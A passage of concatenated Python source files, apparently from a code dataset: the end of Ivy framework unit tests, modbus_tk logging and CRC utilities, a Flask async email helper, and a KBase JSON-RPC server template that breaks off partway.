assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly, the new cached functions
# each use the same global dict
ret0 = ivy.cache_fn(func)()
ret0_again = ivy.cache_fn(func)()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
def test_cache_fn_with_args(device, call):
def func(_):
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn(0)
ret0_again = cached_fn(0)
ret1 = cached_fn(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly, the new cached functions
# each use the same global dict
ret0 = ivy.cache_fn(func)(0)
ret0_again = ivy.cache_fn(func)(0)
ret1 = ivy.cache_fn(func)(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
def test_framework_setting_with_threading(device, call):
if call is helpers.jnp_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
def thread_fn():
x_ = jnp.array([0.0, 1.0, 2.0])
ivy.set_backend("jax")
for _ in range(2000):
try:
ivy.mean(x_)
except TypeError:
return False
ivy.unset_backend()
return True
# get original framework string and array
fws = ivy.current_backend_str()
x = ivy.array([0.0, 1.0, 2.0])
# start jax loop thread
thread = threading.Thread(target=thread_fn)
thread.start()
time.sleep(0.01)
# start local original framework loop
ivy.set_backend(fws)
for _ in range(2000):
ivy.mean(x)
ivy.unset_backend()
assert not thread.join()
def test_framework_setting_with_multiprocessing(device, call):
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
def worker_fn(out_queue):
ivy.set_backend("numpy")
x_ = np.array([0.0, 1.0, 2.0])
for _ in range(1000):
try:
ivy.mean(x_)
except TypeError:
out_queue.put(False)
return
ivy.unset_backend()
out_queue.put(True)
# get original framework string and array
fws = ivy.current_backend_str()
x = ivy.array([0.0, 1.0, 2.0])
# start numpy loop thread
output_queue = multiprocessing.Queue()
worker = multiprocessing.Process(target=worker_fn, args=(output_queue,))
worker.start()
# start local original framework loop
ivy.set_backend(fws)
for _ in range(1000):
ivy.mean(x)
ivy.unset_backend()
worker.join()
assert output_queue.get_nowait()
def test_explicit_ivy_framework_handles(device, call):
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
# store original framework string and unset
fw_str = ivy.current_backend_str()
ivy.unset_backend()
# set with explicit handle caught
ivy_exp = ivy.get_backend(fw_str)
assert ivy_exp.current_backend_str() == fw_str
# assert backend implemented function is accessible
assert "array" in ivy_exp.__dict__
assert callable(ivy_exp.array)
# assert joint implemented function is also accessible
assert "cache_fn" in ivy_exp.__dict__
assert callable(ivy_exp.cache_fn)
# set global ivy to numpy
ivy.set_backend("numpy")
# assert the explicit handle is still unchanged
assert ivy.current_backend_str() == "numpy"
assert ivy_exp.current_backend_str() == fw_str
# unset global ivy from numpy
ivy.unset_backend()
def test_class_ivy_handles(device, call):
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
class ArrayGen:
def __init__(self, ivyh):
self._ivy = ivyh
def get_array(self):
return self._ivy.array([0.0, 1.0, 2.0], dtype="float32", device=device)
# create instance
ag = ArrayGen(ivy.get_backend())
# create array from array generator
x = ag.get_array()
# verify this is not a numpy array
assert not isinstance(x, np.ndarray)
# change global framework to numpy
ivy.set_backend("numpy")
# create another array from array generator
x = ag.get_array()
# verify this is not still a numpy array
assert not isinstance(x, np.ndarray)
# einops_rearrange
@pytest.mark.parametrize(
"x_n_pattern_n_newx",
[([[0.0, 1.0, 2.0, 3.0]], "b n -> n b", [[0.0], [1.0], [2.0], [3.0]])],
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_rearrange(x_n_pattern_n_newx, dtype, tensor_fn, device, call):
# smoke test
x, pattern, new_x = x_n_pattern_n_newx
x = tensor_fn(x, dtype=dtype, device=device)
ret = ivy.einops_rearrange(x, pattern)
true_ret = einops.rearrange(ivy.to_native(x), pattern)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# einops_reduce
@pytest.mark.parametrize(
"x_n_pattern_n_red_n_newx", [([[0.0, 1.0, 2.0, 3.0]], "b n -> b", "mean", [1.5])]
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_reduce(x_n_pattern_n_red_n_newx, dtype, tensor_fn, device, call):
# smoke test
x, pattern, reduction, new_x = x_n_pattern_n_red_n_newx
x = tensor_fn(x, dtype=dtype, device=device)
ret = ivy.einops_reduce(x, pattern, reduction)
true_ret = einops.reduce(ivy.to_native(x), pattern, reduction)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# einops_repeat
@pytest.mark.parametrize(
"x_n_pattern_n_al_n_newx",
[
(
[[0.0, 1.0, 2.0, 3.0]],
"b n -> b n c",
{"c": 2},
[[[0.0, 0.0], [1.0, 1.0], [2.0, 2.0], [3.0, 3.0]]],
)
],
)
@pytest.mark.parametrize("dtype", ["float32"])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_repeat(x_n_pattern_n_al_n_newx, dtype, tensor_fn, device, call):
# smoke test
x, pattern, axes_lengths, new_x = x_n_pattern_n_al_n_newx
x = tensor_fn(x, dtype=dtype, device=device)
ret = ivy.einops_repeat(x, pattern, **axes_lengths)
true_ret = einops.repeat(ivy.to_native(x), pattern, **axes_lengths)
# type test
assert ivy.is_ivy_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# container types
def test_container_types(device, call):
cont_types = ivy.container_types()
assert isinstance(cont_types, list)
for cont_type in cont_types:
assert hasattr(cont_type, "keys")
assert hasattr(cont_type, "values")
assert hasattr(cont_type, "items")
def test_inplace_arrays_supported(device, call):
cur_fw = ivy.current_backend_str()
if cur_fw in ["numpy", "mxnet", "torch"]:
assert ivy.inplace_arrays_supported()
elif cur_fw in ["jax", "tensorflow"]:
assert not ivy.inplace_arrays_supported()
else:
raise Exception("Unrecognized framework")
def test_inplace_variables_supported(device, call):
cur_fw = ivy.current_backend_str()
if cur_fw in ["numpy", "mxnet", "torch", "tensorflow"]:
assert ivy.inplace_variables_supported()
elif cur_fw in ["jax"]:
assert not ivy.inplace_variables_supported()
else:
raise Exception("Unrecognized framework")
@pytest.mark.parametrize("x_n_new", [([0.0, 1.0, 2.0], [2.0, 1.0, 0.0]), (0.0, 1.0)])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_inplace_update(x_n_new, tensor_fn, device, call):
x_orig, new_val = x_n_new
if call is helpers.mx_call and isinstance(x_orig, Number):
# MxNet supports neither 0-dim variables nor 0-dim inplace updates
pytest.skip()
x_orig = tensor_fn(x_orig, dtype="float32", device=device)
new_val = tensor_fn(new_val, dtype="float32", device=device)
if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or (
tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()
):
x = ivy.inplace_update(x_orig, new_val)
assert id(x) == id(x_orig)
assert np.allclose(ivy.to_numpy(x), ivy.to_numpy(new_val))
return
pytest.skip()
@pytest.mark.parametrize("x_n_dec", [([0.0, 1.0, 2.0], [2.0, 1.0, 0.0]), (0.0, 1.0)])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_inplace_decrement(x_n_dec, tensor_fn, device, call):
x_orig, dec = x_n_dec
if call is helpers.mx_call and isinstance(x_orig, Number):
# MxNet supports neither 0-dim variables nor 0-dim inplace updates
pytest.skip()
x_orig = tensor_fn(x_orig, dtype="float32", device=device)
dec = tensor_fn(dec, dtype="float32", device=device)
new_val = x_orig - dec
if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or (
tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()
):
x = ivy.inplace_decrement(x_orig, dec)
assert id(x) == id(x_orig)
assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
return
pytest.skip()
@pytest.mark.parametrize("x_n_inc", [([0.0, 1.0, 2.0], [2.0, 1.0, 0.0]), (0.0, 1.0)])
@pytest.mark.parametrize("tensor_fn", [ivy.array, helpers.var_fn])
def test_inplace_increment(x_n_inc, tensor_fn, device, call):
x_orig, inc = x_n_inc
if call is helpers.mx_call and isinstance(x_orig, Number):
# MxNet supports neither 0-dim variables nor 0-dim inplace updates
pytest.skip()
x_orig = tensor_fn(x_orig, dtype="float32", device=device)
inc = tensor_fn(inc, dtype="float32", device=device)
new_val = x_orig + inc
if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or (
tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()
):
x = ivy.inplace_increment(x_orig, inc)
assert id(x) == id(x_orig)
assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
return
pytest.skip()
# Still to Add #
# ---------------#
# is_ivy_array
# is_array
# is_ivy_container
# all_equal
# to_numpy
# clip_matrix_norm
# unstack
# value_is_nan
# has_nans
# exists
# shape_to_tuple
# try_else_none
# arg_names
# cache_fn
# current_framework_str
# get_min_denominator
# set_min_denominator
# get_min_base
# set_min_base
# stable_divide
# stable_pow
# get_all_arrays_in_memory
# num_arrays_in_memory
# print_all_arrays_in_memory
# set_queue_timeout
# queue_timeout
# tmp_dir
# set_tmp_dir
# supports_inplace
# assert_supports_inplace
|
utils.py
|
from __future__ import print_function
import sys
import threading
import socket
import select
import logging
LOGGER = logging.getLogger("modbus_tk")
PY2 = sys.version_info[0] == 2
PY3 = sys.version_info[0] == 3
def threadsafe_function(fcn):
"""decorator making sure that the decorated function is thread safe"""
lock = threading.RLock()
def new(*args, **kwargs):
"""Lock and call the decorated function
Unless kwargs['threadsafe'] == False
"""
threadsafe = kwargs.pop('threadsafe', True)
if threadsafe:
lock.acquire()
try:
ret = fcn(*args, **kwargs)
except Exception as excpt:
raise excpt
finally:
if threadsafe:
lock.release()
return ret
return new
def flush_socket(socks, lim=0):
"""remove the data present on the socket"""
input_socks = [socks]
cnt = 0
while True:
i_socks = select.select(input_socks, input_socks, input_socks, 0.0)[0]
if len(i_socks) == 0:
break
for sock in i_socks:
sock.recv(1024)
if lim > 0:
cnt += 1
if cnt >= lim:
# avoid infinite loop due to loss of connection
raise Exception("flush_socket: maximum number of iterations reached")
def get_log_buffer(prefix, buff):
"""Format binary data into a string for debug purpose"""
log = prefix
for i in buff:
log += str(ord(i) if PY2 else i) + "-"
return log[:-1]
class ConsoleHandler(logging.Handler):
"""This class is a logger handler. It prints on the console"""
def __init__(self):
"""Constructor"""
logging.Handler.__init__(self)
def emit(self, record):
"""format and print the record on the console"""
print(self.format(record))
class LogitHandler(logging.Handler):
"""This class is a logger handler. It send to a udp socket"""
def __init__(self, dest):
"""Constructor"""
logging.Handler.__init__(self)
self._dest = dest
self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def emit(self, record):
"""format and send the record over udp"""
data = self.format(record) + "\r\n"
if PY3:
data = to_data(data)
self._sock.sendto(data, self._dest)
class DummyHandler(logging.Handler):
"""This class is a logger handler. It doesn't do anything"""
def __init__(self):
"""Constructor"""
super(DummyHandler, self).__init__()
def emit(self, record):
"""do nothing with the given record"""
pass
def create_logger(name="dummy", level=logging.DEBUG, record_format=None):
"""Create a logger according to the given settings"""
if record_format is None:
record_format = "%(asctime)s\t%(levelname)s\t%(module)s.%(funcName)s\t%(threadName)s\t%(message)s"
logger = logging.getLogger("modbus_tk")
logger.setLevel(level)
formatter = logging.Formatter(record_format)
if name == "udp":
log_handler = LogitHandler(("127.0.0.1", 1975))
elif name == "console":
log_handler = ConsoleHandler()
elif name == "dummy":
log_handler = DummyHandler()
else:
raise Exception("Unknown handler %s" % name)
log_handler.setFormatter(formatter)
logger.addHandler(log_handler)
return logger
def swap_bytes(word_val):
"""swap lsb and msb of a word"""
msb = (word_val >> 8) & 0xFF
lsb = word_val & 0xFF
return (lsb << 8) + msb
def calculate_crc(data):
"""Calculate the CRC16 of a datagram"""
CRC16table = (
0x0000, 0xC0C1, 0xC181, 0x0140, 0xC301, 0x03C0, 0x0280, 0xC241,
0xC601, 0x06C0, 0x0780, 0xC741, 0x0500, 0xC5C1, 0xC481, 0x0440,
0xCC01, 0x0CC0, 0x0D80, 0xCD41, 0x0F00, 0xCFC1, 0xCE81, 0x0E40,
0x0A00, 0xCAC1, 0xCB81, 0x0B40, 0xC901, 0x09C0, 0x0880, 0xC841,
0xD801, 0x18C0, 0x1980, 0xD941, 0x1B00, 0xDBC1, 0xDA81, 0x1A40,
0x1E00, 0xDEC1, 0xDF81, 0x1F40, 0xDD01, 0x1DC0, 0x1C80, 0xDC41,
0x1400, 0xD4C1, 0xD581, 0x1540, 0xD701, 0x17C0, 0x1680, 0xD641,
0xD201, 0x12C0, 0x1380, 0xD341, 0x1100, 0xD1C1, 0xD081, 0x1040,
0xF001, 0x30C0, 0x3180, 0xF141, 0x3300, 0xF3C1, 0xF281, 0x3240,
0x3600, 0xF6C1, 0xF781, 0x3740, 0xF501, 0x35C0, 0x3480, 0xF441,
0x3C00, 0xFCC1, 0xFD81, 0x3D40, 0xFF01, 0x3FC0, 0x3E80, 0xFE41,
0xFA01, 0x3AC0, 0x3B80, 0xFB41, 0x3900, 0xF9C1, 0xF881, 0x3840,
0x2800, 0xE8C1, 0xE981, 0x2940, 0xEB01, 0x2BC0, 0x2A80, 0xEA41,
0xEE01, 0x2EC0, 0x2F80, 0xEF41, 0x2D00, 0xEDC1, 0xEC81, 0x2C40,
0xE401, 0x24C0, 0x2580, 0xE541, 0x2700, 0xE7C1, 0xE681, 0x2640,
0x2200, 0xE2C1, 0xE381, 0x2340, 0xE101, 0x21C0, 0x2080, 0xE041,
0xA001, 0x60C0, 0x6180, 0xA141, 0x6300, 0xA3C1, 0xA281, 0x6240,
0x6600, 0xA6C1, 0xA781, 0x6740, 0xA501, 0x65C0, 0x6480, 0xA441,
0x6C00, 0xACC1, 0xAD81, 0x6D40, 0xAF01, 0x6FC0, 0x6E80, 0xAE41,
0xAA01, 0x6AC0, 0x6B80, 0xAB41, 0x6900, 0xA9C1, 0xA881, 0x6840,
0x7800, 0xB8C1, 0xB981, 0x7940, 0xBB01, 0x7BC0, 0x7A80, 0xBA41,
0xBE01, 0x7EC0, 0x7F80, 0xBF41, 0x7D00, 0xBDC1, 0xBC81, 0x7C40,
0xB401, 0x74C0, 0x7580, 0xB541, 0x7700, 0xB7C1, 0xB681, 0x7640,
0x7200, 0xB2C1, 0xB381, 0x7340, 0xB101, 0x71C0, 0x7080, 0xB041,
0x5000, 0x90C1, 0x9181, 0x5140, 0x9301, 0x53C0, 0x5280, 0x9241,
0x9601, 0x56C0, 0x5780, 0x9741, 0x5500, 0x95C1, 0x9481, 0x5440,
0x9C01, 0x5CC0, 0x5D80, 0x9D41, 0x5F00, 0x9FC1, 0x9E81, 0x5E40,
0x5A00, 0x9AC1, 0x9B81, 0x5B40, 0x9901, 0x59C0, 0x5880, 0x9841,
0x8801, 0x48C0, 0x4980, 0x8941, 0x4B00, 0x8BC1, 0x8A81, 0x4A40,
0x4E00, 0x8EC1, 0x8F81, 0x4F40, 0x8D01, 0x4DC0, 0x4C80, 0x8C41,
0x4400, 0x84C1, 0x8581, 0x4540, 0x8701, 0x47C0, 0x4680, 0x8641,
0x8201, 0x42C0, 0x4380, 0x8341, 0x4100, 0x81C1, 0x8081, 0x4040
)
crc = 0xFFFF
if PY2:
for c in data:
crc = (crc >> 8) ^ CRC16table[(ord(c) ^ crc) & 0xFF]
else:
for c in data:
crc = (crc >> 8) ^ CRC16table[((c) ^ crc) & 0xFF]
return swap_bytes(crc)
def calculate_rtu_inter_char(baudrate):
"""calculates the interchar delay from the baudrate"""
if baudrate <= 19200:
return 11.0 / baudrate
else:
return 0.0005
class WorkerThread(object):
"""
A thread which is running an almost-ever loop
It can be stopped by calling the stop function
"""
def __init__(self, main_fct, args=(), init_fct=None, exit_fct=None):
"""Constructor"""
self._fcts = [init_fct, main_fct, exit_fct]
self._args = args
self._thread = threading.Thread(target=WorkerThread._run, args=(self,))
self._go = threading.Event()
def start(self):
"""Start the thread"""
self._go.set()
self._thread.start()
def stop(self):
"""stop the thread"""
if self._thread.is_alive():
self._go.clear()
self._thread.join()
def _run(self):
"""main function of the thread execute _main_fct until stop is called"""
# pylint: disable=broad-except
try:
if self._fcts[0]:
self._fcts[0](*self._args)
while self._go.isSet():
self._fcts[1](*self._args)
except Exception as excpt:
LOGGER.error("error: %s", str(excpt))
finally:
if self._fcts[2]:
self._fcts[2](*self._args)
def to_data(string_data):
if PY2:
return string_data
else:
return bytearray(string_data, 'ascii')
|
email.py
|
# -*- coding:utf-8 -*-
# @author: lw_guo
# @time: 2020/12/7
from threading import Thread
from flask import current_app, render_template
from freefree.app import mail
from flask_mail import Message
def send_async_email(app, msg):
with app.app_context():
try:
mail.send(msg)
except Exception as e:
raise e('Failure to send this email.')
def send_email(to, subject, template, **kwargs):
msg = Message('[FreeFree]' + subject,
sender=current_app.config['MAIL_USERNAME'],
recipients=[to])
msg.html = render_template(template, **kwargs)
app = current_app._get_current_object()
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return msg
|
Coverage_CalculatorServer.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from wsgiref.simple_server import make_server
import sys
import json
import traceback
import datetime
from multiprocessing import Process
from getopt import getopt, GetoptError
from jsonrpcbase import JSONRPCService, InvalidParamsError, KeywordError,\
JSONRPCError, InvalidRequestError
from jsonrpcbase import ServerError as JSONServerError
from os import environ
from ConfigParser import ConfigParser
from biokbase import log
import requests as _requests
import random as _random
import os
from Coverage_Calculator.authclient import KBaseAuth as _KBaseAuth
DEPLOY = 'KB_DEPLOYMENT_CONFIG'
SERVICE = 'KB_SERVICE_NAME'
AUTH = 'auth-service-url'
# Note that the error fields do not match the 2.0 JSONRPC spec
def get_config_file():
return environ.get(DEPLOY, None)
def get_service_name():
return environ.get(SERVICE, None)
def get_config():
if not get_config_file():
return None
retconfig = {}
config = ConfigParser()
config.read(get_config_file())
for nameval in config.items(get_service_name() or 'Coverage_Calculator'):
retconfig[nameval[0]] = nameval[1]
return retconfig
config = get_config()
from Coverage_Calculator.Coverage_CalculatorImpl import Coverage_Calculator # noqa @IgnorePep8
impl_Coverage_Calculator = Coverage_Calculator(config)
class JSONObjectEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, set):
return list(obj)
if isinstance(obj, frozenset):
return list(obj)
if hasattr(obj, 'toJSONable'):
return obj.toJSONable()
return json.JSONEncoder.default(self, obj)
class JSONRPCServiceCustom(JSONRPCService):
def call(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in a JSON
string or None if there is none.
Arguments:
jsondata -- remote method call in jsonrpc format
"""
result = self.call_py(ctx, jsondata)
if result is not None:
return json.dumps(result, cls=JSONObjectEncoder)
return None
def _call_method(self, ctx, request):
"""Calls given method with given params and returns it value."""
method = self.method_data[request['method']]['method']
params = request['params']
result = None
try:
if isinstance(params, list):
# Does it have enough arguments?
if len(params) < self._man_args(method) - 1:
raise InvalidParamsError('not enough arguments')
# Does it have too many arguments?
if(not self._vargs(method) and len(params) >
self._max_args(method) - 1):
raise InvalidParamsError('too many arguments')
result = method(ctx, *params)
elif isinstance(params, dict):
# Do not accept keyword arguments if the jsonrpc version is
# not >=1.1.
if request['jsonrpc'] < 11:
raise KeywordError
result = method(ctx, **params)
else: # No params
result = method(ctx)
except JSONRPCError:
raise
except Exception as e:
# log.exception('method %s threw an exception' % request['method'])
# Exception was raised inside the method.
newerr = JSONServerError()
newerr.trace = traceback.format_exc()
if isinstance(e.message, basestring):
newerr.data = e.message
else:
# Some exceptions embed other exceptions as the message
newerr.data = repr(e.message)
raise newerr
return result
def call_py(self, ctx, jsondata):
"""
Calls jsonrpc service's method and returns its return value in python
object format or None if there is none.
This method is same as call() except the return value is a python
object instead of JSON string. This method is mainly only useful for
debugging purposes.
"""
rdata = jsondata
# we already deserialize the json string earlier in the server code, no
# need to do it again
# try:
# rdata = json.loads(jsondata)
# except ValueError:
# raise ParseError
# set some default values for error handling
request = self._get_default_vals()
if isinstance(rdata, dict) and rdata:
# It's a single request.
self._fill_request(request, rdata)
respond = self._handle_request(ctx, request)
# Don't respond to notifications
if respond is None:
return None
return respond
elif isinstance(rdata, list) and rdata:
# It's a batch.
requests = []
responds = []
for rdata_ in rdata:
# set some default values for error handling
request_ = self._get_default_vals()
self._fill_request(request_, rdata_)
requests.append(request_)
for request_ in requests:
respond = self._handle_request(ctx, request_)
# Don't respond to notifications
if respond is not None:
responds.append(respond)
if responds:
return responds
# Nothing to respond.
return None
else:
# empty dict, list or wrong type
raise InvalidRequestError
def _handle_request(self, ctx, request):
"""Handles given request and returns its response."""
if self.method_data[request['method']].has_key('types'): # noqa @IgnorePep8
self._validate_params_types(request['method'], request['params'])
result = self._call_method(ctx, request)
# Do not respond to notifications.
if request['id'] is None:
return None
respond = {}
self._fill_ver(request['jsonrpc'], respond)
respond['result'] = result
respond['id'] = request['id']
return respond
class MethodContext(dict):
def __init__(self, logger):
self['client_ip'] = None
self['user_id'] = None
self['authenticated'] = None
self['token'] = None
self['module'] = None
self['method'] = None
self['call_id'] = None
self['rpc_context'] = None
self['provenance'] = None
self._debug_levels = set([7, 8, 9, 'DEBUG', 'DEBUG2', 'DEBUG3'])
self._logger = logger
def log_err(self, message):
self._log(log.ERR, message)
def log_info(self, message):
self._log(log.INFO, message)
def log_debug(self, message, level=1):
if level in self._debug_levels:
pass
else:
level = int(level)
if level < 1 or level > 3:
raise ValueError("Illegal log level: " + str(level))
level = level + 6
self._log(level, message)
def set_log_level(self, level):
self._logger.set_log_level(level)
def get_log_level(self):
return self._logger.get_log_level()
def clear_log_level(self):
self._logger.clear_user_log_level()
def _log(self, level, message):
self._logger.log_message(level, message, self['client_ip'],
self['user_id'], self['module'],
self['method'], self['call_id'])
def provenance(self):
callbackURL = os.environ.get('SDK_CALLBACK_URL')
if callbackURL:
# OK, there's a callback server from which we can get provenance
arg_hash = {'method': 'CallbackServer.get_provenance',
'params': [],
'version': '1.1',
'id': str(_random.random())[2:]
}
body = json.dumps(arg_hash)
response = _requests.post(callbackURL, data=body,
timeout=60)
response.encoding = 'utf-8'
if response.status_code == 500:
if ('content-type' in response.headers and
response.headers['content-type'] ==
'application/json'):
err = response.json()
if 'error' in err:
raise ServerError(**err['error'])
else:
raise ServerError('Unknown', 0, response.text)
else:
raise ServerError('Unknown', 0, response.text)
if not response.ok:
response.raise_for_status()
resp = response.json()
if 'result' not in resp:
raise ServerError('Unknown', 0,
'An unknown server error occurred')
return resp['result'][0]
else:
return self.get('provenance')
class ServerError(Exception):
'''
The call returned an error. Fields:
name - the name of the error.
code - the error code.
message - a human readable error message.
data - the server side stacktrace.
'''
def __init__(self, name, code, message, data=None, error=None):
super(Exception, self).__init__(message)
self.name = name
self.code = code
self.message = message if message else ''
self.data = data or error or ''
# data = JSON RPC 2.0, error = 1.1
def __str__(self):
return self.name + ': ' + str(self.code) + '. ' + self.message + \
'\n' + self.data
def getIPAddress(environ):
xFF = environ.get('HTTP_X_FORWARDED_FOR')
realIP = environ.get('HTTP_X_REAL_IP')
trustXHeaders = config is None or \
config.get('dont_trust_x_ip_headers') != 'true'
if (trustXHeaders):
if (xFF):
return xFF.split(',')[0].strip()
if (realIP):
return realIP.strip()
return environ.get('REMOTE_ADDR')
class Application(object):
# Wrap the wsgi handler in a class definition so that we can
# do some initialization and avoid regenerating stuff over
# and over
def logcallback(self):
self.serverlog.set_log_file(self.userlog.get_log_file())
def log(self, level, context, message):
self.serverlog.log_message(level, message, context['client_ip'],
context['user_id'], context['module'],
context['method'], context['call_id'])
def __init__(self):
submod = get_service_name() or 'Coverage_Calculator'
self.userlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, changecallback=self.logcallback,
config=get_config_file())
self.serverlog = log.log(
submod, ip_address=True, authuser=True, module=True, method=True,
call_id=True, logfile=self.userlog.get_log_file())
self.serverlog.set_log_level(6)
self.rpc_service = JSONRPCServiceCustom()
self.method_authentication = dict()
self.rpc_service.add(impl_Coverage_Calculator.run_Coverage_Calculator,
name='Coverage_Calculator.run_Coverage_Calculator',
types=[dict])
self.method_authentication['Coverage_Calculator.run_Coverage_Calculator'] = 'required' # noqa
self.rpc_service.add(impl_Coverage_Calculator.status,
name='Coverage_Calculator.status',
types=[dict])
authurl = config.get(AUTH) if config else None
self.auth_client = _KBaseAuth(authurl)
def __call__(self, environ, start_response):
# Context object, equivalent to the perl impl CallContext
ctx = MethodContext(self.userlog)
ctx['client_ip'] = getIPAddress(environ)
status = '500 Internal Server Error'
try:
body_size = int(environ.get('CONTENT_LENGTH', 0))
except (ValueError):
body_size = 0
if environ['REQUEST_METHOD'] == 'OPTIONS':
# we basically do nothing and just return headers
status = '200 OK'
rpc_result = ""
else:
request_body = environ['wsgi.input'].read(body_size)
try:
req = json.loads(request_body)
except ValueError as ve:
err = {'error': {'code': -32700,
'name': "Parse error",
'message': str(ve),
}
}
rpc_result = self.process_error(err, ctx, {'version': '1.1'})
else:
ctx['module'], ctx['method'] = req['method'].split('.')
ctx['call_id'] = req['id']
ctx['rpc_context'] = {
'call_stack': [{'time': self.now_in_utc(),
'method': req['method']}
]
}
prov_action = {'service': ctx['module'],
'method': ctx['method'],
'method_params': req['params']
}
ctx['provenance'] = [prov_action]
try:
token = environ.get('HTTP_AUTHORIZATION')
# parse out the method being requested and check if it
# has an authentication requirement
method_name = req['method']
auth_req = self.method_authentication.get(
method_name, 'none')
if auth_req != 'none':
if token is None and auth_req == 'required':
err = JSONServerError()
err.data = (
'Authentication required for ' +
'Coverage_Calculator ' +
'but no authentication header was passed')
raise err
elif token is None and auth_req == 'optional':
pass
else:
try:
user = self.auth_client.get_user(token)
ctx['user_id'] = user
ctx['authenticated'] = 1
ctx['token'] = token
except Exception, e:
if auth_req == 'required':
err = JSONServerError()
err.data = \
"Token validation failed: %s" % e
raise err
if (environ.get('HTTP_X_FORWARDED_FOR')):
self.log(log.INFO, ctx, 'X-Forwarded-For: ' +
environ.get('HTTP_X_FORWARDED_FOR'))
self.log(log.INFO, ctx, 'start method')
rpc_result = self.rpc_service.call(ctx, req)
self.log(log.INFO, ctx, 'end method')
status = '200 OK'
except JSONRPCError as jre:
err = {'error': {'code': jre.code,
'name': jre.message,
'message': jre.data
}
}
trace = jre.trace if hasattr(jre, 'trace') else None
rpc_result = self.process_error(err, ctx, req, trace)
except Exception:
err = {'error': {'code': 0,
'name': 'Unexpected Server Error',
'message': 'An unexpected server error ' +
'occurred',
}
}
rpc_result = self.process_error(err, ctx, req,
traceback.format_exc())
# print 'Request method was %s\n' % environ['REQUEST_METHOD']
# print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ)
# print 'Request body was: %s' % request_body
# print 'Result from the method call is:\n%s\n' % \
# pprint.pformat(rpc_result)
if rpc_result:
response_body = rpc_result
else:
response_body = ''
response_headers = [
('Access-Control-Allow-Origin', '*'),
('Access-Control-Allow-Headers', environ.get(
'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')),
('content-type', 'application/json'),
('content-length', str(len(response_body)))]
start_response(status, response_headers)
return [response_body]
def process_error(self, error, context, request, trace=None):
if trace:
self.log(log.ERR, context, trace.split('\n')[0:-1])
if 'id' in request:
error['id'] = request['id']
if 'version' in request:
error['version'] = request['version']
e = error['error'].get('error')
if not e:
error['error']['error'] = trace
elif 'jsonrpc' in request:
error['jsonrpc'] = request['jsonrpc']
error['error']['data'] = trace
else:
error['version'] = '1.0'
error['error']['error'] = trace
return json.dumps(error)
def now_in_utc(self):
# noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8
dtnow = datetime.datetime.now()
dtutcnow = datetime.datetime.utcnow()
delta = dtnow - dtutcnow
hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60,
60)
return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm)
application = Application()
# This is the uwsgi application dictionary. On startup uwsgi will look
# for this dict and pull its configuration from here.
# This simply lists where to "mount" the application in the URL path
#
# This uwsgi module "magically" appears when running the app within
# uwsgi and is not available otherwise, so wrap an exception handler
# around it
#
# To run this server in uwsgi with 4 workers listening on port 9999 use:
# uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_
# To run a using the single threaded python BaseHTTP service
# listening on port 9999 by default execute this file
#
try:
import uwsgi
# Before we do anything with the application, see if the
# configs specify patching all std routines to be asynch
# *ONLY* use this if you are going to wrap the service in
# a wsgi container that has enabled gevent, such as
# uwsgi with the --gevent option
if config is not None and config.get('gevent_monkeypatch_all', False):
print "Monkeypatching std libraries for async"
from gevent import monkey
monkey.patch_all()
uwsgi.applications = {'': application}
except ImportError:
# Not available outside of wsgi, ignore
pass
_proc = None
def start_server(host='localhost', port=0, newprocess=False):
'''
By default, will start the server on localhost on a system assigned port
